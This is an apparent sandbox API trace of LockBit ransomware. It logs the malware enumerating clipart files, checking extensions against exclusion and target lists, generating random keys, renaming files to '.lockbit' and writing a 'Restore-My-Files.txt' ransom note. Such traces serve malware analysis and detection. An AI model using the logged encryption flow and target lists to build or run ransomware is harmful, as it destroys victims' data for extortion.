[0168.118] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0168.118] free (_Block=0x1fa2ed8) [0168.118] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01213K.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0168.118] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0168.118] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0168.118] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5a3d9150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1c94, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH01221K.JPG", cAlternateFileName="")) returned 1 [0168.118] lstrcmpiW (lpString1=".", lpString2="PH01221K.JPG") returned -1 [0168.118] lstrcmpiW (lpString1="..", lpString2="PH01221K.JPG") returned -1 [0168.118] PathFindExtensionW (pszPath="PH01221K.JPG") returned=".JPG" [0168.118] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0168.118] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0168.118] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0168.119] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0168.119] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0168.119] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0168.119] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0168.119] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0168.119] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0168.119] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0168.119] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0168.119] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0168.119] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0168.119] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0168.119] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0168.119] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0168.119] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0168.119] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0168.119] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0168.119] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0168.119] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0168.119] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0168.119] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0168.119] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0168.119] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0168.119] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0168.119] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0168.119] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0168.119] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0168.119] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0168.119] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0168.119] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0168.120] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0168.120] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0168.120] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0168.120] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0168.120] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0168.120] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0168.120] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0168.120] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0168.120] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0168.120] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0168.120] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0168.120] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0168.120] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0168.120] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0168.120] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0168.120] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH01221K.JPG") returned 1 [0168.120] lstrcmpiW (lpString1="ntldr", lpString2="PH01221K.JPG") returned -1 [0168.120] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH01221K.JPG") returned -1 [0168.120] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH01221K.JPG") returned -1 [0168.120] lstrcmpiW (lpString1="autorun.inf", lpString2="PH01221K.JPG") returned -1 [0168.120] lstrcmpiW (lpString1="thumbs.db", lpString2="PH01221K.JPG") returned 1 [0168.120] lstrcmpiW (lpString1="iconcache.db", lpString2="PH01221K.JPG") returned -1 [0168.120] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0168.120] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01221K.JPG") returned=".JPG" [0168.120] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0168.120] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0168.120] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0168.120] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0168.120] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0168.121] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0168.121] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0168.121] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0168.121] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0168.121] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0168.121] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0168.121] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0168.121] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0168.121] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0168.121] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0168.121] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0168.121] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0168.121] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0168.121] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0168.121] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0168.121] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0168.121] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0168.121] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0168.121] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0168.121] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0168.121] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0168.121] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0168.121] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0168.121] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01221K.JPG.lockbit") returned 72 [0168.121] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01221K.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01221k.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0168.122] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0168.123] malloc (_Size=0x40068) returned 0x3df0008 [0168.123] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=7316) returned 1 [0168.123] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.123] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.123] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0168.123] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.124] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.124] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0168.124] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0168.125] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01221K.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01221K.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0168.125] malloc (_Size=0xa6) returned 0x1fa2ed8 [0168.125] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0168.126] free (_Block=0x1fa2ed8) [0168.126] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01221K.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0168.126] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0168.126] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0168.126] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37b36e00, ftCreationTime.dwHighDateTime=0x1bd4e53, ftLastAccessTime.dwLowDateTime=0x6ce6f8f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x37b36e00, ftLastWriteTime.dwHighDateTime=0x1bd4e53, nFileSizeHigh=0x0, nFileSizeLow=0x7db8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH01235U.BMP", cAlternateFileName="")) returned 1 [0168.127] lstrcmpiW (lpString1=".", lpString2="PH01235U.BMP") returned -1 [0168.127] lstrcmpiW (lpString1="..", lpString2="PH01235U.BMP") returned -1 [0168.127] PathFindExtensionW (pszPath="PH01235U.BMP") returned=".BMP" [0168.127] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0168.127] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0168.127] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0168.127] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0168.127] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0168.127] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0168.127] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0168.127] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0168.127] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0168.127] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0168.127] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0168.127] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0168.127] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0168.127] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0168.127] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0168.127] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0168.127] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0168.127] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0168.127] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0168.127] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0168.127] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0168.128] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0168.128] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0168.128] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0168.128] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0168.128] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0168.128] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0168.128] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0168.128] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0168.128] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0168.128] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0168.128] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0168.128] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0168.128] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0168.128] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0168.128] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0168.128] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0168.128] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0168.128] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0168.128] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0168.128] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0168.128] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0168.128] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0168.128] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0168.128] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0168.128] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0168.129] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0168.129] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH01235U.BMP") returned 1 [0168.129] lstrcmpiW (lpString1="ntldr", lpString2="PH01235U.BMP") returned -1 [0168.129] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH01235U.BMP") returned -1 [0168.129] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH01235U.BMP") returned -1 [0168.129] lstrcmpiW (lpString1="autorun.inf", lpString2="PH01235U.BMP") returned -1 [0168.129] lstrcmpiW (lpString1="thumbs.db", lpString2="PH01235U.BMP") returned 1 [0168.129] lstrcmpiW (lpString1="iconcache.db", lpString2="PH01235U.BMP") returned -1 [0168.129] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0168.129] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01235U.BMP") returned=".BMP" [0168.129] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0168.129] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0168.129] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0168.129] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0168.129] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0168.129] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0168.129] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0168.129] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0168.129] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0168.129] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0168.129] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0168.129] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0168.129] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0168.129] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0168.130] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0168.130] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0168.130] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0168.130] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0168.130] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0168.130] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0168.130] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0168.130] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0168.130] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0168.130] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0168.130] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0168.130] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0168.130] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0168.130] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0168.130] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01235U.BMP.lockbit") returned 72 [0168.130] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01235U.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01235u.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0168.131] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0168.131] malloc (_Size=0x40068) returned 0x1ff1e60 [0168.131] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=32184) returned 1 [0168.131] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.132] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.132] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0168.132] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.132] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.132] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0168.132] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0168.134] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01235U.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01235U.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0168.134] malloc (_Size=0xa6) returned 0x1fa2ed8 [0168.134] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0168.135] free (_Block=0x1fa2ed8) [0168.135] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01235U.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0168.135] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0168.135] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0168.135] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc83e7e00, ftCreationTime.dwHighDateTime=0x1bd4e54, ftLastAccessTime.dwLowDateTime=0x5a3d9150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc83e7e00, ftLastWriteTime.dwHighDateTime=0x1bd4e54, nFileSizeHigh=0x0, nFileSizeLow=0x7ce0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH01236U.BMP", cAlternateFileName="")) returned 1 [0168.135] lstrcmpiW (lpString1=".", lpString2="PH01236U.BMP") returned -1 [0168.135] lstrcmpiW (lpString1="..", lpString2="PH01236U.BMP") returned -1 [0168.135] PathFindExtensionW (pszPath="PH01236U.BMP") returned=".BMP" [0168.135] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0168.136] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0168.136] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0168.136] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0168.136] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0168.136] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0168.136] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0168.136] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0168.136] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0168.136] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0168.136] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0168.136] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0168.136] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0168.136] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0168.136] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0168.136] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0168.136] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0168.136] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0168.136] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0168.136] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0168.136] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0168.136] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0168.136] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0168.136] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0168.136] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0168.136] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0168.136] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0168.136] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0168.137] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0168.137] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0168.137] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0168.137] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0168.137] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0168.137] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0168.137] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0168.137] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0168.137] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0168.137] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0168.137] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0168.137] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0168.137] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0168.137] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0168.137] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0168.137] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0168.137] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0168.137] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0168.137] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0168.137] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH01236U.BMP") returned 1 [0168.137] lstrcmpiW (lpString1="ntldr", lpString2="PH01236U.BMP") returned -1 [0168.137] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH01236U.BMP") returned -1 [0168.137] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH01236U.BMP") returned -1 [0168.137] lstrcmpiW (lpString1="autorun.inf", lpString2="PH01236U.BMP") returned -1 [0168.137] lstrcmpiW (lpString1="thumbs.db", lpString2="PH01236U.BMP") returned 1 [0168.138] lstrcmpiW (lpString1="iconcache.db", lpString2="PH01236U.BMP") returned -1 [0168.138] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0168.138] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01236U.BMP") returned=".BMP" [0168.138] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0168.138] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0168.138] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0168.138] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 